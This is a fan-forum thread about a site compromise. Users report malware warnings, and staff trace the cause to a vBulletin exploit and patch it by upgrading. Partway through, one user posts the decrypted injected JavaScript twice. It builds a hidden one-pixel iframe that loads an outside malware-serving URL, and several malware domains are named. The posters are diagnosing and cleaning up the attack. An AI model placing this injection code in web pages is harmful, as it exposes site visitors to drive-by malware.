Hi Guys, Being a frequent visitor of this forum I know this is usually not a problem. Be careful though as my antivirus detected some hidden malware. I would suggest you check to make sure there isn't anything fishy going on. Thanks, just letting the admins be aware. :)
Guys Be Careful!
-
-
Yea, google chrome warned me too. I ignored it and i was sent to some Russian sites.
-
Yep, I got a virus issue also. My security system even said it blocked one.
-
It keeps trying to load these pages from the main page of the forum.
Don't Click ! Malware !
Russhirt.ru
russiaurist.ru
Don't Click ! Malware !I have no idea if this is helpful, because I don't know nothing about computers XD
-
It's being looked into.
Generally, since we don't host ads on our site; or allow uploads, attachments, scripts, or html on the forums, and its all run on a linux based server, it should be impossible to have most of the usual malware problems, but it does seem something wonky is going on all the same.
Be careful and don't follow any random links, and make sure you have pop-up blockers on, and we'll try to have it sorted out as soon as possible.
-
Sigh… i've been getting the damn message now when I click on the 'forums' link.
Never had a problem with this site... but this is actually the first time i've EVER seen the message.
I'm not gonna worry.... but I visit this site a shit ton. So anything out of the ordinary can sometimes worry me.
-
I'm getting it too, from Avast! Antivirus. I'm sure it's nothing but it is pretty annoying.
-
This is a new problem. I don't think, based on what I'm looking at, that it's putting anyone at risk. We'll get it fixed ASAP either way, though.
-
I have received that warning all day long
-
The problem has been located and neutralized.
-
Yay. Heroes of the day.
-
You guys need to upgrade vBulletin too.
(and apparently brenn is only one who can do it -.-) -
Does anybody know if this malware would prevent a computer from opening properly? My family's desktop right now can only be opened in safe mode. Trying to fix it now.
–- Update From New Post Merge ---
Update: It's working now so I guess it doesn't matter.
-
No problems right now or ever for me :ninja: .
-
Made a thread about this here
http://apforums.net/showthread.php?t=33564
Anyway nothing popped up on the index page today.
–- Update From New Post Merge ---
The problem has been located and neutralized.
So, what was causing it ? Since Robby said how that the site doesn't allow redirects, ads etc. I am realy curious as to what it could have been.
-
Got a message again now D:
-
-
I just got it again too
I talked to holy about it on AIM and thought it was weird
just saying I'm still getting the warning message-
Warning: Something's Not Right Here!
apforums.net contains content from abnev.ru, a site known to distribute malware. Your computer might catch a virus if you visit this site.even if the problem is fixed. still gonna browse the forums but it seems weird!
-
Yeah, I see the problem. We'll deal with it as soon as I can locate an admin.
@No:
So, what was causing it ? Since Robby said how that the site doesn't allow redirects, ads etc. I am realy curious as to what it could have been.
Security exploit in the VBulletin software. We need to upgrade. It's on the list, and rapidly gaining priority.
-
Since my browser was asking permission for a Java plug-in, I guess the problem was a Java drive-by, which someone put in this site…
-
Security exploit in the VBulletin software. We need to upgrade. It's on the list, and rapidly gaining priority.
I think index.php file (or folder) is 777. But yes some other exploit too in our current version of vB.
looking at malware code
its an encrypted js which decrypts tofunction xj(sjvkgbdhot, jji, mnftjz) { if (jji in sjvkgbdhot) { sjvkgbdhot[jji] = mnftjz; } } var ndqysgvlovy = window; var html = ""; var qbgc = ndqysgvlovy.document; var fos = "XOR"; var nzxtaaeol = qbgc.createElement; function alkjcakjwerwrbjsdlf() { return "iframe"; } function afdlidhadekwr12() { return "width"; } var rvqbphwb = qbgc.body.appendChild; function get17(enc) { if (enc == undefined) { enc = ""; } return "src"; } var iter = 0; function vslkrjrsa() { return "height"; } var siecugtayix = null; if ("call" in nzxtaaeol) { siecugtayix = nzxtaaeol.call(qbgc, alkjcakjwerwrbjsdlf()); } else { siecugtayix = nzxtaaeol(alkjcakjwerwrbjsdlf()); } var lost = "fieldset"; xj(siecugtayix, afdlidhadekwr12(), "1"); xj(siecugtayix, vslkrjrsa(), "1"); xj(siecugtayix, get17(), "http://yandekapi.com/api?in=847"); if ("call" in rvqbphwb) { rvqbphwb.call(qbgc.body, siecugtayix); } else { rvqbphwb(siecugtayix); } ```so it calls that yandekapi, which later loads that ru site. but this is why you should always use firefox with noscript
-
i got the error from chrome as well (using mac osx snow leopard) I chose proceed and nothing else happened.
-
I think index.php file (or folder) is 777. But yes some other exploit too in our current version of vB.
looking at malware code
its an encrypted js which decrypts tofunction xj(sjvkgbdhot, jji, mnftjz) { if (jji in sjvkgbdhot) { sjvkgbdhot[jji] = mnftjz; } } var ndqysgvlovy = window; var html = ""; var qbgc = ndqysgvlovy.document; var fos = "XOR"; var nzxtaaeol = qbgc.createElement; function alkjcakjwerwrbjsdlf() { return "iframe"; } function afdlidhadekwr12() { return "width"; } var rvqbphwb = qbgc.body.appendChild; function get17(enc) { if (enc == undefined) { enc = ""; } return "src"; } var iter = 0; function vslkrjrsa() { return "height"; } var siecugtayix = null; if ("call" in nzxtaaeol) { siecugtayix = nzxtaaeol.call(qbgc, alkjcakjwerwrbjsdlf()); } else { siecugtayix = nzxtaaeol(alkjcakjwerwrbjsdlf()); } var lost = "fieldset"; xj(siecugtayix, afdlidhadekwr12(), "1"); xj(siecugtayix, vslkrjrsa(), "1"); xj(siecugtayix, get17(), "http://yandekapi.com/api?in=847"); if ("call" in rvqbphwb) { rvqbphwb.call(qbgc.body, siecugtayix); } else { rvqbphwb(siecugtayix); } ```so it calls that yandekapi, which later loads that ru site. but this is why you should always use firefox with noscript
I'm well aware of what's causing the problem, but thanks. I just need an admin to be able to fix it.
Oh and it's fixed btw.
-
I am not getting the message anymore, but it seems like other people still are. I think you are right that it is being done through some forum exploit.
Oh just read the post above. Yeah glad the issue is taken care of.
-
I just got the message again off google chrome when going into the forum section, proceeded anyway and avast blocked some malware >.>..
-
Huh? I just checked the HTML and I see nothing.
-
Huh? I just checked the HTML and I see nothing.
It showed up for me a while ago too. Nothing now…..
-
-
Actually, I'm getting the messages again too. Just started again like two minutes ago.
-
-
It just keeps coming and going doesn't it? just got the message again =/
-
I see the problem. Sigh.
-
Seems like Avast and/or Google Chrome is a hypochondriac.
-
We're getting attacked pretty frequently. I've been given temporary power to deal with it until we can patch a security fix.
-
We're getting attacked pretty frequently. I've been given temporary power to deal with it until we can patch a security fix.
I'm pretty much a computer noob, but I'd like to ask exactly how the hell did they manage to do it ?
-
We're getting attacked pretty frequently. I've been given temporary power to deal with it until we can patch a security fix.
just an idea: how about adding a cron job to keep fixing until perm solution is found.
-
Also, could we merge mine and this topic, just so people don't stay in the dark because they post in just one ?
-
@No:
I'm pretty much a computer noob, but I'd like to ask exactly how the hell did they manage to do it ?
There's a question I'd really rather not answer.
just an idea: how about adding a cron job to keep fixing until perm solution is found.
I don't believe I have such flexibility. The tools I'm provided are pretty crap.
-
oh… that kindda sucks and means its more work for you.
Keep the good work up.
-
Thx for the hard work Jonas,brennen and Urouge.
-
@Don:
Thx for the hard work Jonas,brennen and Urouge.
Agreed - I'm not getting anything here - but I am on work computers using IE7 (can not use anything else) but I was wondering what is it to look out for?
-
…and apparently brenn is only one who can do it -.-
Don't give me that face, punk ass!
@No:
So, what was causing it? Since Robby said how that the site doesn't allow redirects, ads etc. I am realy curious as to what it could have been.
Whatever/whoever it was, it was using the exploit on the version of vB we had to insert a script that would load/redirect to some other site that contained malware and such. Likely a bot just crawling through and looking for vulnerable sites.
just an idea: how about adding a cron job to keep fixing until perm solution is found.
Of the four I saw, only two were in the same place, so I'm not sure it would have helped. None of the folders were 777; one, for the styles, had been in the past but that was because the upgrade to vB4 was having issues, and I changed it back afterward.
The reason the upgrade took so long was because, yeah, I'm one of the few who can and will do the upgrade at the moment, but more importantly because close to none of our plugins are supported beyond the version of vBulletin we had, this Fishman Island theme included. I didn't want to upgrade unless we had to because it could have caused more problems than it was worth. With the frequent exploits this week, however, we couldn't wait any longer. Fortunately most of the issues from the upgrade have been ironed out and only one plugin had to be disabled (temporarily).
It's also a pain in the butt to run vBulletin upgrades. Between checking the fixes and features, updating tables, backing up the db, copying the new files, running the upgrade, upgrading the plugins, fixing the plugins, fixing the themes, fixing permissions, testing the site afterward, etc, etc… it takes forever. So annoying. I hate you vBulletin!
-
Haha… Brennen - The Last Standing Pillar of Arlong Park!
But yea i understand that its pain in ass upgrading software (its more pain fixing compatibility issues). I spent most of last 24 hours fixing similar issues for someone and by the time I was done, I really hated that terminal screen and nano. So yea i understand and feel for you and thanks a lot for the hard work ^_^
-
Speaking of pains in the butt… Fire-Fist, and others, I know some of you were interested in themes before, well, I'm open to anyone who wants to try and make a theme, and I will be pushing something in the near future that should allow easier development for the theme. In the mean time, if you don't want to build from the ground up, I suggest you start getting ideas from vbulletin.org in the 4.X styles section; If you like something, I can grab it and we can get to work. Keep in mind our version number, there might be compatibility issues, but for the most part if you know what you are doing (like Fire-Fist), coming up with something decent shouldn't be a stretch. I've been really busy since the upgrade in April, so I sort of put all this junk on the backburner, but I had another (darker) theme like 80% ready to go... I'm just not impressed with it. Urouge and I have been working on tweaking it this last week, so we might just say screw it and push it out over the next few weeks. There are a few others I will be working on as well... I'm sure you all have ideas and suggestions, so feel free to put them out there. I'll try and get that mobile version out as well, for those of you who browse from their phones. /exhale
-
I'm getting malware warnings from Chrome again on the main forums page. No sir, I don't like it!
Wonder what the deal is.
-
Happened to me too.
God dammit guys :(
-
Well now there's a bad sign.
I fixed the injection, but now it's back to the security issue again.
-
Oh I got this on my laptop maybe an hour ago? I was using google chrome though, clicked the main forum index and POOF, virus warning -.- it never happens on firefox on the main PC though so it doesn't usually bother me.
-
damn this is bad… do we actually know the how exactly is he injecting?
-
I'm pretty sure I've figured out the issue. It'll take me some time to fix it assuming I'm right, but if I am it should take care of all the problems.